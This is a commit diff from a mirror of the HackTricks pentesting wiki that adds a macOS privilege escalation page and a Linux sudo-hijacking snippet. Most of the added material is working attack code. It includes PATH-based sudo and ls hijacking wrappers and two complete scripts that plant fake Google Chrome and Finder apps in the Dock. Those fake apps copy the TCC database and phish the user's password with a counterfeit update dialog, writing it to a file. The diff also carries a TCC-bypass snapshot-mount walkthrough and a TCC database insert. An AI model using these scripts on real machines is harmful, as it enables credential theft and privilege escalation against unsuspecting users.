mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
GITBOOK-4199: change request with no subject merged in GitBook
This commit is contained in:
parent
f97bf8980c
commit
d9768bdb93
5 changed files with 308 additions and 48 deletions
|
@ -162,6 +162,7 @@
|
|||
* [macOS Sensitive Locations](macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md)
|
||||
* [macOS Universal binaries & Mach-O Format](macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md)
|
||||
* [macOS Objective-C](macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md)
|
||||
* [macOS Privilege Escalation](macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md)
|
||||
* [macOS Proces Abuse](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md)
|
||||
* [macOS Dirty NIB](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md)
|
||||
* [macOS Electron Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md)
|
||||
|
|
|
@ -7,7 +7,7 @@
|
|||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
@ -93,7 +93,7 @@ You can check if the sudo version is vulnerable using this grep.
|
|||
sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"
|
||||
```
|
||||
|
||||
### sudo < v1.28
|
||||
#### sudo < v1.28
|
||||
|
||||
From @sickrov
|
||||
|
||||
|
@ -1152,6 +1152,23 @@ If you know that a **user usually connects to a machine and uses `sudo`** to esc
|
|||
|
||||
Note that if the user uses a different shell (not bash) you will need to modify other files to add the new path. For example[ sudo-piggyback](https://github.com/APTy/sudo-piggyback) modifies `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. You can find another example in [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire\_modules/bashdoor.py)
|
||||
|
||||
Or running something like:
|
||||
|
||||
```bash
|
||||
cat >/tmp/sudo <<EOF
|
||||
#!/bin/bash
|
||||
/usr/bin/sudo whoami > /tmp/privesc
|
||||
/usr/bin/sudo "\$@"
|
||||
EOF
|
||||
chmod +x /tmp/sudo
|
||||
echo ‘export PATH=/tmp:$PATH’ >> $HOME/.zshenv # or ".bashrc" or any other
|
||||
|
||||
# From the victim
|
||||
zsh
|
||||
echo $PATH
|
||||
sudo ls
|
||||
```
|
||||
|
||||
## Shared Library
|
||||
|
||||
### ld.so
|
||||
|
@ -1254,7 +1271,6 @@ screen -ls <username>/ # Show another user' screen sessions
|
|||
|
||||
![](<../../.gitbook/assets/image (130).png>)
|
||||
|
||||
|
||||
**Attach to a session**
|
||||
|
||||
```bash
|
||||
|
@ -1649,7 +1665,7 @@ Files that ship in packages downloaded from the distribution repository go into
|
|||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -104,13 +104,7 @@ For this kind of vulnerabilities don't forget to **check vulnerable `.pkg` insta
|
|||
[macos-installers-abuse.md](macos-files-folders-and-binaries/macos-installers-abuse.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Entitlements and Privileges abuse via process abuse
|
||||
|
||||
If a process can **inject code in another process with better privileges or entitlements** or contact it to perform privileges actions, he could escalate privileges and bypass defensive meassures such as [Sandbox](macos-security-protections/macos-sandbox/) or [TCC](macos-security-protections/macos-tcc/).
|
||||
|
||||
{% content-ref url="macos-proces-abuse/" %}
|
||||
[macos-proces-abuse](macos-proces-abuse/)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### File Extension & URL scheme app handlers
|
||||
|
||||
|
@ -120,49 +114,22 @@ Weird apps registered by file extensions could be abused and different applicati
|
|||
[macos-file-extension-apps.md](macos-file-extension-apps.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## MacOS Privilege Escalation
|
||||
## macOS TCC / SIP Privilege Escalation
|
||||
|
||||
### CVE-2020-9771 - mount\_apfs TCC bypass and privilege escalation
|
||||
In macOS **applications and binaries can have permissions** to access folders or settings that make them more privileged than others.
|
||||
|
||||
**Any user** (even unprivileged ones) can create and mount a time machine snapshot an **access ALL the files** of that snapshot.\
|
||||
The **only privileged** needed is for the application used (like `Terminal`) to have **Full Disk Access** (FDA) access (`kTCCServiceSystemPolicyAllfiles`) which need to be granted by an admin.
|
||||
Therefore, an attacker that wants to successfully compromise a macOS machine will need to **escalate its TCC privileges** (or even **bypass SIP**, depending on his needs).
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
# Create snapshot
|
||||
tmutil localsnapshot
|
||||
These privileges are usually given in the form of **entitlements** the application is signed with, or the application might requested some accesses and after the **user approving them** they can be found in the **TCC databases**. Another way a process can obtain these privileges is by being a **child of a process** with those **privileges** as they are usually **inherited**.
|
||||
|
||||
# List snapshots
|
||||
tmutil listlocalsnapshots /
|
||||
Snapshots for disk /:
|
||||
com.apple.TimeMachine.2023-05-29-001751.local
|
||||
Follow these links to find different was to [**escalate privileges in TCC**](macos-security-protections/macos-tcc/#tcc-privesc-and-bypasses), to [**bypass TCC**](macos-security-protections/macos-tcc/macos-tcc-bypasses/) and how in the past [**SIP has been bypassed**](macos-security-protections/macos-sip.md#sip-bypasses).
|
||||
|
||||
# Generate folder to mount it
|
||||
cd /tmp # I didn it from this folder
|
||||
mkdir /tmp/snap
|
||||
## macOS Traditional Privilege Escalation
|
||||
|
||||
# Mount it, "noowners" will mount the folder so the current user can access everything
|
||||
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap
|
||||
Of course from a red teams perspective you should be also interested in escalating to root. Check the following post for some hints:
|
||||
|
||||
# Access it
|
||||
ls /tmp/snap/Users/admin_user # This will work
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
A more detailed explanation can be [**found in the original report**](https://theevilbit.github.io/posts/cve\_2020\_9771/)**.**
|
||||
|
||||
### Sensitive Information
|
||||
|
||||
{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %}
|
||||
[macos-sensitive-locations.md](macos-files-folders-and-binaries/macos-sensitive-locations.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Linux Privesc
|
||||
|
||||
First of all, please note that **most of the tricks about privilege escalation affecting Linux/Unix will affect also MacOS** machines. So see:
|
||||
|
||||
{% content-ref url="../../linux-hardening/privilege-escalation/" %}
|
||||
[privilege-escalation](../../linux-hardening/privilege-escalation/)
|
||||
{% content-ref url="macos-privilege-escalation.md" %}
|
||||
[macos-privilege-escalation.md](macos-privilege-escalation.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## References
|
||||
|
|
|
@ -0,0 +1,270 @@
|
|||
# macOS Privilege Escalation
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
## TCC Privilege Escalation
|
||||
|
||||
If you came here looking for TCC privilege escalation go to:
|
||||
|
||||
{% content-ref url="macos-security-protections/macos-tcc/" %}
|
||||
[macos-tcc](macos-security-protections/macos-tcc/)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Linux Privesc
|
||||
|
||||
Please note that **most of the tricks about privilege escalation affecting Linux/Unix will affect also MacOS** machines. So see:
|
||||
|
||||
{% content-ref url="../../linux-hardening/privilege-escalation/" %}
|
||||
[privilege-escalation](../../linux-hardening/privilege-escalation/)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## User Interaction
|
||||
|
||||
### Sudo Hijacking
|
||||
|
||||
You can find the original [Sudo Hijacking technique inside the Linux Privilege Escalation post](../../linux-hardening/privilege-escalation/#sudo-hijacking).
|
||||
|
||||
However, macOS **maintains** the user's **`PATH`** when he executes **`sudo`**. Which means that another way to achieve this attack would be to **hijack other binaries** that the victim sill execute when **running sudo:**
|
||||
|
||||
```bash
|
||||
# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH
|
||||
cat > /opt/homebrew/bin/ls <<EOF
|
||||
#!/bin/bash
|
||||
if [ "\$(id -u)" -eq 0 ]; then
|
||||
whoami > /tmp/privesc
|
||||
fi
|
||||
/bin/ls "\$@"
|
||||
EOF
|
||||
chmod +x /opt/homebrew/bin/ls
|
||||
|
||||
# victim
|
||||
sudo ls
|
||||
```
|
||||
|
||||
Note that a user that uses the terminal will highly probable have **Homebrew installed**. So it's possible to hijack binaries in **`/opt/homebrew/bin`**.
|
||||
|
||||
### Dock Impersonation
|
||||
|
||||
Using some **social engineering** you could **impersonate for example Google Chrome** inside the dock and actually execute your own script:
|
||||
|
||||
|
||||
|
||||
{% tabs %}
|
||||
{% tab title="Chrome Impersonation" %}
|
||||
Some suggestions:
|
||||
|
||||
* Check in the Dock if there is a Chrome, and in that case **remove** that entry and **add** the **fake** **Chrome entry in the same position** in the Dock array. 
|
||||
|
||||
```bash
|
||||
#!/bin/sh
|
||||
|
||||
# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)
|
||||
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';
|
||||
|
||||
rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null
|
||||
|
||||
# Create App structure
|
||||
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
|
||||
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources
|
||||
|
||||
# Payload to execute
|
||||
cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c <<EOF
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
|
||||
int main() {
|
||||
char *cmd = "open /Applications/Google\\\\ Chrome.app & "
|
||||
"sleep 2; "
|
||||
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
|
||||
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); "
|
||||
"echo \$PASSWORD > /tmp/passwd.txt";
|
||||
system(cmd);
|
||||
return 0;
|
||||
}
|
||||
EOF
|
||||
|
||||
gcc /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c -o /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
|
||||
rm -rf /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c
|
||||
|
||||
chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
|
||||
|
||||
# Info.plist
|
||||
cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
|
||||
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
|
||||
<plist version="1.0">
|
||||
<dict>
|
||||
<key>CFBundleExecutable</key>
|
||||
<string>Google Chrome</string>
|
||||
<key>CFBundleIdentifier</key>
|
||||
<string>com.google.Chrome</string>
|
||||
<key>CFBundleName</key>
|
||||
<string>Google Chrome</string>
|
||||
<key>CFBundleVersion</key>
|
||||
<string>1.0</string>
|
||||
<key>CFBundleShortVersionString</key>
|
||||
<string>1.0</string>
|
||||
<key>CFBundleInfoDictionaryVersion</key>
|
||||
<string>6.0</string>
|
||||
<key>CFBundlePackageType</key>
|
||||
<string>APPL</string>
|
||||
<key>CFBundleIconFile</key>
|
||||
<string>app</string>
|
||||
</dict>
|
||||
</plist>
|
||||
EOF
|
||||
|
||||
# Copy icon from Google Chrome
|
||||
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns
|
||||
|
||||
# Add to Dock
|
||||
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
|
||||
sleep 0.1
|
||||
killall Dock
|
||||
```
|
||||
{% endtab %}
|
||||
|
||||
{% tab title="Finder Impersonation" %}
|
||||
Some suggestions:
|
||||
|
||||
* You **cannot remove Finder from the Dock**, so if you are going to add it to the Dock, you could put the fake Finder just next to the real one. For this you need to **add the fake Finder entry at the beginning of the Dock array**.
|
||||
* Another option is to not place it in the Dock and just open it, "Finder asking to control Finder" is not that weird.
|
||||
|
||||
```bash
|
||||
#!/bin/sh
|
||||
|
||||
# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)
|
||||
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%';
|
||||
|
||||
rm -rf /tmp/Finder.app/ 2>/dev/null
|
||||
|
||||
# Create App structure
|
||||
mkdir -p /tmp/Finder.app/Contents/MacOS
|
||||
mkdir -p /tmp/Finder.app/Contents/Resources
|
||||
|
||||
# Payload to execute
|
||||
cat > /tmp/Finder.app/Contents/MacOS/Finder.c <<EOF
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
|
||||
int main() {
|
||||
char *cmd = "open /System/Library/CoreServices/Finder.app & "
|
||||
"sleep 2; "
|
||||
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
|
||||
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); "
|
||||
"echo \$PASSWORD > /tmp/passwd.txt";
|
||||
system(cmd);
|
||||
return 0;
|
||||
}
|
||||
EOF
|
||||
|
||||
gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder
|
||||
rm -rf /tmp/Finder.app/Contents/MacOS/Finder.c
|
||||
|
||||
chmod +x /tmp/Finder.app/Contents/MacOS/Finder
|
||||
|
||||
# Info.plist
|
||||
cat << EOF > /tmp/Finder.app/Contents/Info.plist
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
|
||||
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
|
||||
<plist version="1.0">
|
||||
<dict>
|
||||
<key>CFBundleExecutable</key>
|
||||
<string>Finder</string>
|
||||
<key>CFBundleIdentifier</key>
|
||||
<string>com.apple.finder</string>
|
||||
<key>CFBundleName</key>
|
||||
<string>Finder</string>
|
||||
<key>CFBundleVersion</key>
|
||||
<string>1.0</string>
|
||||
<key>CFBundleShortVersionString</key>
|
||||
<string>1.0</string>
|
||||
<key>CFBundleInfoDictionaryVersion</key>
|
||||
<string>6.0</string>
|
||||
<key>CFBundlePackageType</key>
|
||||
<string>APPL</string>
|
||||
<key>CFBundleIconFile</key>
|
||||
<string>app</string>
|
||||
</dict>
|
||||
</plist>
|
||||
EOF
|
||||
|
||||
# Copy icon from Finder
|
||||
cp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns
|
||||
|
||||
# Add to Dock
|
||||
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Finder.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
|
||||
sleep 0.1
|
||||
killall Dock
|
||||
```
|
||||
{% endtab %}
|
||||
{% endtabs %}
|
||||
|
||||
## TCC - Root Privilege Escalation
|
||||
|
||||
### CVE-2020-9771 - mount\_apfs TCC bypass and privilege escalation
|
||||
|
||||
**Any user** (even unprivileged ones) can create and mount a time machine snapshot an **access ALL the files** of that snapshot.\
|
||||
The **only privileged** needed is for the application used (like `Terminal`) to have **Full Disk Access** (FDA) access (`kTCCServiceSystemPolicyAllfiles`) which need to be granted by an admin.
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
# Create snapshot
|
||||
tmutil localsnapshot
|
||||
|
||||
# List snapshots
|
||||
tmutil listlocalsnapshots /
|
||||
Snapshots for disk /:
|
||||
com.apple.TimeMachine.2023-05-29-001751.local
|
||||
|
||||
# Generate folder to mount it
|
||||
cd /tmp # I didn it from this folder
|
||||
mkdir /tmp/snap
|
||||
|
||||
# Mount it, "noowners" will mount the folder so the current user can access everything
|
||||
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap
|
||||
|
||||
# Access it
|
||||
ls /tmp/snap/Users/admin_user # This will work
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
A more detailed explanation can be [**found in the original report**](https://theevilbit.github.io/posts/cve\_2020\_9771/)**.**
|
||||
|
||||
## Sensitive Information
|
||||
|
||||
This can be useful to escalate privileges:
|
||||
|
||||
{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %}
|
||||
[macos-sensitive-locations.md](macos-files-folders-and-binaries/macos-sensitive-locations.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
###
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
|
@ -118,7 +118,7 @@ Checking both databases you can check the permissions an app has allowed, has fo
|
|||
* The **`auth_reason`** can take the following values: Error(1), User Consent(2), User Set(3), System Set(4), Service Policy(5), MDM Policy(6), Override Policy(7), Missing usage string(8), Prompt Timeout(9), Preflight Unknown(10), Entitled(11), App Type Policy(12)
|
||||
* The **csreq** field is there to indicate how to verify the binary to execute and grant the TCC permissions:
|
||||
|
||||
```
|
||||
```bash
|
||||
# Query to get cserq in printable hex
|
||||
select service, client, hex(csreq) from access where auth_value=2;
|
||||
|
||||
|
@ -251,7 +251,11 @@ The extended attribute `com.apple.macl` **can’t be cleared** like other extend
|
|||
|
||||
If at some point you manage to get write access over a TCC database you can use something like the following to add an entry (remove the comments):
|
||||
|
||||
```
|
||||
<details>
|
||||
|
||||
<summary>Insert into TCC example</summary>
|
||||
|
||||
```sql
|
||||
INSERT INTO access (
|
||||
service,
|
||||
client,
|
||||
|
@ -291,6 +295,8 @@ INSERT INTO access (
|
|||
);
|
||||
```
|
||||
|
||||
</details>
|
||||
|
||||
### Privesc from Automation to FDA
|
||||
|
||||
**Finder** is an application that **always has FDA** (even if it doesn't appear in the UI), so if you have **Automation** privileges over it, you can abuse its privileges to **make it do some actions**.
|
||||
|
|
Loading…
Reference in a new issue